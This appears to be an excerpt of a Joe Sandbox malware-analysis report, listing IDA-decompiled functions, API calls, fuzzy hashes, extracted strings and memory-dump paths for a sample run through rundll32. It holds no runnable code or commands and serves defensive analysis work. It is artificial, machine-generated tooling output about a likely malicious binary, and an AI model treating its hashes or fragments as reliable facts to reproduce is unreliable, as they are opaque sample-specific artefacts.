                    • Opcode ID: 64cb293eba0dea1c5e2c42353cd1dde031a31cd41995d287c30ae4d6b0d1df31
                    • Instruction ID: 6b23cbb0de2251482d2d8ebaa0c5d61e1cb162b82ffaa140f1937f0079758414
                    • Opcode Fuzzy Hash: 64cb293eba0dea1c5e2c42353cd1dde031a31cd41995d287c30ae4d6b0d1df31
                    • Instruction Fuzzy Hash: CAE01A386001048EDB24EB69C049BB873D5BF8825DF5A24E1D94DCB222D73AF5918953
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 03981781a3597a0d89d582af0a334b93bbdb1d2b37c9825902e0ca78667bd343
                    • Instruction ID: ad2976187d4380cd3eafc77e0477ee4669ddb6b8a4a4ce72ba490b0bb6707101
                    • Opcode Fuzzy Hash: 03981781a3597a0d89d582af0a334b93bbdb1d2b37c9825902e0ca78667bd343
                    • Instruction Fuzzy Hash: D9B1F574A08249AFFF01CFA9CA40BAEBBF5BF46314F104199ED91DB281D7709961CB61
                    APIs
                      • Part of subcall function 6CFF1D10: ___std_exception_copy.LIBVCRUNTIME ref: 6CFF1DAF
                      • Part of subcall function 6CFF52C9: __EH_prolog3.LIBCMT ref: 6CFF52D0
                      • Part of subcall function 6CFF52C9: std::_Lockit::_Lockit.LIBCPMT ref: 6CFF52DB
                      • Part of subcall function 6CFF52C9: std::locale::_Setgloballocale.LIBCPMT ref: 6CFF52F6
                      • Part of subcall function 6CFF52C9: _Yarn.LIBCPMT ref: 6CFF530C
                      • Part of subcall function 6CFF52C9: ?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(6D070F48,00000000,00000004,6CFF469D,00000001,76230BD0,000000FF,?,6CFF3941,76230BD4,00000002,93BD9D6B,00000000,00000000), ref: 6CFF5318
                      • Part of subcall function 6CFF52C9: ?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(00000000,00000004,6CFF469D,00000001,76230BD0,000000FF,?,6CFF3941,76230BD4,00000002,93BD9D6B,00000000), ref: 6CFF533C
                      • Part of subcall function 6CFF52C9: std::_Lockit::~_Lockit.LIBCPMT ref: 6CFF5349
                    • std::_Lockit::_Lockit.LIBCPMT ref: 6CFF46CF
                    • std::_Lockit::_Lockit.LIBCPMT ref: 6CFF46F3
                    • std::_Lockit::~_Lockit.LIBCPMT ref: 6CFF4714
                    • std::_Facet_Register.LIBCPMT ref: 6CFF4786
                    • std::_Lockit::~_Lockit.LIBCPMT ref: 6CFF47A2
                    • Concurrency::cancel_current_task.LIBCPMT ref: 6CFF4808
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$DisablePrintScreen@@$Concurrency::cancel_current_taskFacet_H_prolog3RegisterSetgloballocaleYarn___std_exception_copystd::locale::_
                    • String ID:
                    • API String ID: 510134389-0
                    • Opcode ID: 8ef982e104bff47bd5fd6420283c99fc0813d8a9b2bea637fe9d47f57dd8ae5c
                    • Instruction ID: 243a28b416700a986592b62ceb2ec80e9dd95c538b55743b5187cb1acf762303
                    • Opcode Fuzzy Hash: 8ef982e104bff47bd5fd6420283c99fc0813d8a9b2bea637fe9d47f57dd8ae5c
                    • Instruction Fuzzy Hash: B5616EB1A006099FEB10CFA4C584B9EBBF0FF0A714F244619E425ABB90D775A949CFD1
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: __freea$__alloca_probe_16
                    • String ID: a/p$am/pm
                    • API String ID: 3509577899-3206640213
                    • Opcode ID: d491f2a09968ffb177d7499350efe21d98a6f5369b3a8a247cfb78c706d35a92
                    • Instruction ID: e452fb751f2815ff489189a3846a3dbd495a84f77e36e82c7aaa27f7d906e749
                    • Opcode Fuzzy Hash: d491f2a09968ffb177d7499350efe21d98a6f5369b3a8a247cfb78c706d35a92
                    • Instruction Fuzzy Hash: 69C1ED38954213DBFB118F68CA98BBE77F0FF06340F848159ED10AB652D3318961CBA9
                    APIs
                    • std::_Lockit::_Lockit.LIBCPMT ref: 6CFF4846
                    • std::_Lockit::_Lockit.LIBCPMT ref: 6CFF4869
                    • std::_Lockit::~_Lockit.LIBCPMT ref: 6CFF4889
                    • std::_Facet_Register.LIBCPMT ref: 6CFF48FB
                    • std::_Lockit::~_Lockit.LIBCPMT ref: 6CFF4913
                    • Concurrency::cancel_current_task.LIBCPMT ref: 6CFF4936
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                    • String ID:
                    • API String ID: 2081738530-0
                    • Opcode ID: c2bf29ca8b4520313cc892b6ccec4563806194f98192f090bb7a7eccdf970a66
                    • Instruction ID: 5ef31fc664f0cc8aa56a061a26ed21cbbde4b33ae1de4c6ed1f3f5d60d61b48a
                    • Opcode Fuzzy Hash: c2bf29ca8b4520313cc892b6ccec4563806194f98192f090bb7a7eccdf970a66
                    • Instruction Fuzzy Hash: 4041CE72D00259CFDF11CF94D540BAEBBB4FB06728F244619D82567BA0EB31AA06CBD1
                    APIs
                    • GetLastError.KERNEL32(00000001,?,6D04C8A2,6D048E4B,6D048A5F,?,6D048C97,?,00000001,?,?,00000001,?,6D086738,0000000C,6D048D90), ref: 6D04C991
                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6D04C99F
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6D04C9B8
                    • SetLastError.KERNEL32(00000000,6D048C97,?,00000001,?,?,00000001,?,6D086738,0000000C,6D048D90,?,00000001,?), ref: 6D04CA0A
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLastValue___vcrt_
                    • String ID:
                    • API String ID: 3852720340-0
                    • Opcode ID: 932dab4309c061606c25ed063112f8c5c645b2f71c11c6f297fdbf3f0520a286
                    • Instruction ID: 94ab123a778c397a64638ca4e001125fbd558a0fd0e1d808d30f5b6840746a16
                    • Opcode Fuzzy Hash: 932dab4309c061606c25ed063112f8c5c645b2f71c11c6f297fdbf3f0520a286
                    • Instruction Fuzzy Hash: CA01B53351D312EEFB009A756C98F5E27A4EB437B97218339F610960D0EF514C148198
                    APIs
                    • __CreateFrameInfo.LIBCMT ref: 04EE1C4F
                      • Part of subcall function 04EE17DF: __getptd.LIBCMT ref: 04EE17ED
                      • Part of subcall function 04EE17DF: __getptd.LIBCMT ref: 04EE17FB
                    • __getptd.LIBCMT ref: 04EE1C59
                      • Part of subcall function 04ED3A90: __getptd_noexit.LIBCMT ref: 04ED3A93
                      • Part of subcall function 04ED3A90: __amsg_exit.LIBCMT ref: 04ED3AA0
                    • __getptd.LIBCMT ref: 04EE1C67
                    • __getptd.LIBCMT ref: 04EE1C75
                    • __getptd.LIBCMT ref: 04EE1C80
                    • _CallCatchBlock2.LIBCMT ref: 04EE1CA6
                      • Part of subcall function 04EE1884: __CallSettingFrame@12.LIBCMT ref: 04EE18D0
                      • Part of subcall function 04EE1D4D: __getptd.LIBCMT ref: 04EE1D5C
                      • Part of subcall function 04EE1D4D: __getptd.LIBCMT ref: 04EE1D6A
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                    • String ID:
                    • API String ID: 1602911419-0
                    • Opcode ID: 30984a6dbe13d97b5960a4b950b05162d02aa1851b1736e288da5e5fa3881a39
                    • Instruction ID: b95b08bc50774553df0e95e3a152f3ec9f8644ba5dee18aa70b75a0cfe9d1996
                    • Opcode Fuzzy Hash: 30984a6dbe13d97b5960a4b950b05162d02aa1851b1736e288da5e5fa3881a39
                    • Instruction Fuzzy Hash: 5011DA75D00209DFEB00EFA4C444BEEB7F1FF04318F509469E855AB250DB38A9559F51
                    APIs
                    • __CreateFrameInfo.LIBCMT ref: 04EC2847
                      • Part of subcall function 04EC23D7: __getptd.LIBCMT ref: 04EC23E5
                      • Part of subcall function 04EC23D7: __getptd.LIBCMT ref: 04EC23F3
                    • __getptd.LIBCMT ref: 04EC2851
                      • Part of subcall function 04EB4838: __getptd_noexit.LIBCMT ref: 04EB483B
                      • Part of subcall function 04EB4838: __amsg_exit.LIBCMT ref: 04EB4848
                    • __getptd.LIBCMT ref: 04EC285F
                    • __getptd.LIBCMT ref: 04EC286D
                    • __getptd.LIBCMT ref: 04EC2878
                    • _CallCatchBlock2.LIBCMT ref: 04EC289E
                      • Part of subcall function 04EC247C: __CallSettingFrame@12.LIBCMT ref: 04EC24C8
                      • Part of subcall function 04EC2945: __getptd.LIBCMT ref: 04EC2954
                      • Part of subcall function 04EC2945: __getptd.LIBCMT ref: 04EC2962
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                    • String ID:
                    • API String ID: 1602911419-0
                    • Opcode ID: eb388a6bf7ffd30d9546cee10c0cefd864d406e6d3b94a6c9bbcab691142f51f
                    • Instruction ID: e3c856d47aefb01e44dfa5fe2bf868f67d68d61b52ee8e2b1a6514ebb3018cdd
                    • Opcode Fuzzy Hash: eb388a6bf7ffd30d9546cee10c0cefd864d406e6d3b94a6c9bbcab691142f51f
                    • Instruction Fuzzy Hash: D611F971D002499FEF00EFA4D544AEE77B0FF08318F5190A9F894A7251DB38AA11DF90
                    APIs
                    • __getptd.LIBCMT ref: 04EB7EF8
                      • Part of subcall function 04EB4838: __getptd_noexit.LIBCMT ref: 04EB483B
                      • Part of subcall function 04EB4838: __amsg_exit.LIBCMT ref: 04EB4848
                    • __amsg_exit.LIBCMT ref: 04EB7F18
                    • __lock.LIBCMT ref: 04EB7F28
                    • InterlockedDecrement.KERNEL32(?), ref: 04EB7F45
                    • _free.LIBCMT ref: 04EB7F58
                    • InterlockedIncrement.KERNEL32(051A1680), ref: 04EB7F70
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                    • String ID:
                    • API String ID: 3470314060-0
                    • Opcode ID: 26f422d0de979fe2638f383467e931a3c1eca705c3b4d00eb3ac16a1212f4ed4
                    • Instruction ID: 9434df505bd0d2e61cefc2c6655338521b06924382ae4f66e08404951c63172a
                    • Opcode Fuzzy Hash: 26f422d0de979fe2638f383467e931a3c1eca705c3b4d00eb3ac16a1212f4ed4
                    • Instruction Fuzzy Hash: 9C01C431D00611ABEB21AB69D1097DF7361BB40729F112015E8D4A7A84CB38B842CBD9
                    APIs
                    Strings
                    • 8, xrefs: 6D043355
                    • response reading failed (errno: %d), xrefs: 6D043368
                    • cached response data too big to handle, xrefs: 6D043508
                    • Excessive server response line length received, %zd bytes. Stripping, xrefs: 6D04344A
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLast
                    • String ID: 8$Excessive server response line length received, %zd bytes. Stripping$cached response data too big to handle$response reading failed (errno: %d)
                    • API String ID: 1452528299-4161256678
                    • Opcode ID: c26ff694da01310d2af66d8fd4c41c95c2db1c3759ba701c874baf21ee0f0ea3
                    • Instruction ID: 9bbb86e629e637f7d55cd34ee1812f22e2fbf658b9fb52eaeb90526e24e6febc
                    • Opcode Fuzzy Hash: c26ff694da01310d2af66d8fd4c41c95c2db1c3759ba701c874baf21ee0f0ea3
                    • Instruction Fuzzy Hash: 33818F75648342DFE721CF29D880F6BB7E5AFC9314F50882DF99A87201E735E9098B52
                    APIs
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D0184E0
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D0185CD
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID: %2I64d:%02I64d:%02I64d$%3I64dd %02I64dh$%7I64dd
                    • API String ID: 885266447-564197712
                    • Opcode ID: 772373098035c2750342ac1b4f07ba5d8065082ee3588e56394e7481f75c1277
                    • Instruction ID: 52ba6da1e8ad67268486883f17dc1470ac105a351160817e6b770461792ad5fe
                    • Opcode Fuzzy Hash: 772373098035c2750342ac1b4f07ba5d8065082ee3588e56394e7481f75c1277
                    • Instruction Fuzzy Hash: 50514676B083146BE3089E6CDC40B6EB6D6EBC8214F4A463DF958E7391EAB5DD444281
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: _strspn
                    • String ID: /:#?!@{}[]\$'"^`*<>=;,+&()$%u.%u.%u.%u$0123456789abcdefABCDEF:.
                    • API String ID: 3684824311-414481020
                    • Opcode ID: 565f28a9ca38e478317319ada1700401603d1b1db208fca1d9000e8ce587c435
                    • Instruction ID: 3c8d2dd7e5fafe942e72142d9de4cea3f2b1e781a8d2452d13383356e59c2a4d
                    • Opcode Fuzzy Hash: 565f28a9ca38e478317319ada1700401603d1b1db208fca1d9000e8ce587c435
                    • Instruction Fuzzy Hash: 00515975A0C3534BE720CF38D841B7BBBE49F8A348F55446EE98987242EA62D44987D3
                    APIs
                    • std::_Lockit::_Lockit.LIBCPMT ref: 6CFF4D42
                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6CFF4D8E
                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 6CFF4DAD
                    • std::_Lockit::~_Lockit.LIBCPMT ref: 6CFF4E42
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: std::_$Locinfo::_Lockit$Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                    • String ID: bad locale name
                    • API String ID: 1143662833-1405518554
                    • Opcode ID: 6df42c4f412f3c2d2acc74fa679394e80e15fa4c33118db7aba3ec9d9438ba7d
                    • Instruction ID: cc050cf8340f4f2103021650935656aadc5fe588cd542c9494c84c6d7b081c26
                    • Opcode Fuzzy Hash: 6df42c4f412f3c2d2acc74fa679394e80e15fa4c33118db7aba3ec9d9438ba7d
                    • Instruction Fuzzy Hash: A9414CF1D052499BEF00CFA4D944BDEBFB8EF14218F148425E914AB790E7759605CBA1
                    APIs
                      • Part of subcall function 6CFFEEC0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,6CFF9E6C,?,00000000,00000000,00000008,6CFF1FE0,00000000), ref: 6CFFEED3
                      • Part of subcall function 6CFFEEC0: __alldvrm.LIBCMT ref: 6CFFEEED
                      • Part of subcall function 6CFFEEC0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CFFEF14
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D00726A
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D0072C9
                    Strings
                    • Connection %ld seems to be dead, xrefs: 6D007344
                    • Too old connection (%ld seconds idle), disconnect it, xrefs: 6D007286, 6D00728D
                    • Too old connection (%ld seconds since creation), disconnect it, xrefs: 6D0072E9, 6D0072F0
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$CounterPerformanceQuery__alldvrm
                    • String ID: Connection %ld seems to be dead$Too old connection (%ld seconds idle), disconnect it$Too old connection (%ld seconds since creation), disconnect it
                    • API String ID: 3283211967-1280337241
                    • Opcode ID: 47c9e95964638e006616eab9c129c42a142ac70387ae6e0e34acf1dfafba7930
                    • Instruction ID: 0c6c1a086f90c52604a78701c53e52a52d2529b6783417385f64aeeccc33a242
                    • Opcode Fuzzy Hash: 47c9e95964638e006616eab9c129c42a142ac70387ae6e0e34acf1dfafba7930
                    • Instruction Fuzzy Hash: 7C314525F047417BF311667C4C41BFB73A8EFDA308F148528FA6897252EB6479C583A1
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: _memset$_strrchr
                    • String ID: D
                    • API String ID: 3722325190-2746444292
                    • Opcode ID: ce5fa5e08b36f509c4af0bf848edf5c17ea2ab9df625cf8cc3875fdae94e2d5c
                    • Instruction ID: f11e421f9005d5ef4682380a1409018916f9fb80324354d0aa13e464cf5b6b2e
                    • Opcode Fuzzy Hash: ce5fa5e08b36f509c4af0bf848edf5c17ea2ab9df625cf8cc3875fdae94e2d5c
                    • Instruction Fuzzy Hash: E7410BB2900118ABEB10DB64DC89FFEB7B89F54708F004595E609A71C0DB71AB49CB61
                    APIs
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D030375
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D0303D1
                    Strings
                    • gfff, xrefs: 6D03038F
                    • Connection time-out, xrefs: 6D03033C
                    • set timeouts for state %d; Total % I64d, retry %d maxtry %d, xrefs: 6D0303F0
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID: Connection time-out$gfff$set timeouts for state %d; Total % I64d, retry %d maxtry %d
                    • API String ID: 885266447-1150704995
                    • Opcode ID: 69eeeaf72df21c4ec34ff13b256fa96cf45f9120db736531deae2c8d27616fc5
                    • Instruction ID: bed375653d943cc9863cb488bced22a1b0cdb9496aba64ce9b4480a010146cd0
                    • Opcode Fuzzy Hash: 69eeeaf72df21c4ec34ff13b256fa96cf45f9120db736531deae2c8d27616fc5
                    • Instruction Fuzzy Hash: 2E2105B26097026BF7348E66CC40B6B769DFB81304F12093DF6458B280E776E9088790
                    APIs
                    • std::_Xinvalid_argument.LIBCPMT ref: 04EB1758
                      • Part of subcall function 04EB217D: std::exception::exception.LIBCMT ref: 04EB2192
                      • Part of subcall function 04EB217D: __CxxThrowException@8.LIBCMT ref: 04EB21A7
                      • Part of subcall function 04EB217D: std::exception::exception.LIBCMT ref: 04EB21B8
                    • std::_Xinvalid_argument.LIBCPMT ref: 04EB1776
                    • std::_Xinvalid_argument.LIBCPMT ref: 04EB1791
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw
                    • String ID: invalid string position$string too long
                    • API String ID: 4225265588-4289949731
                    • Opcode ID: 5d4182acdae7301a530905490912af16b69fd05a15fd31543b5ac456d6d06ddf
                    • Instruction ID: 952f5b72ad091f93fbab61daaaa6b6663ced843ec37c0db0c2228ca813b07cd8
                    • Opcode Fuzzy Hash: 5d4182acdae7301a530905490912af16b69fd05a15fd31543b5ac456d6d06ddf
                    • Instruction Fuzzy Hash: FA21A7327003149BD724DE6CE890AABF7E9AF967A4F205A6DE5D18B240D771F84187D0
                    APIs
                    • _malloc.LIBCMT ref: 04EB2A18
                      • Part of subcall function 04EB375E: __FF_MSGBANNER.LIBCMT ref: 04EB3777
                      • Part of subcall function 04EB375E: __NMSG_WRITE.LIBCMT ref: 04EB377E
                      • Part of subcall function 04EB375E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,04EB750C,00000000,00000001,00000000,?,04EBB043,00000018,04ECC790,0000000C,04EBB0D3), ref: 04EB37A3
                    • std::exception::exception.LIBCMT ref: 04EB2A4D
                    • std::exception::exception.LIBCMT ref: 04EB2A67
                    • __CxxThrowException@8.LIBCMT ref: 04EB2A78
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
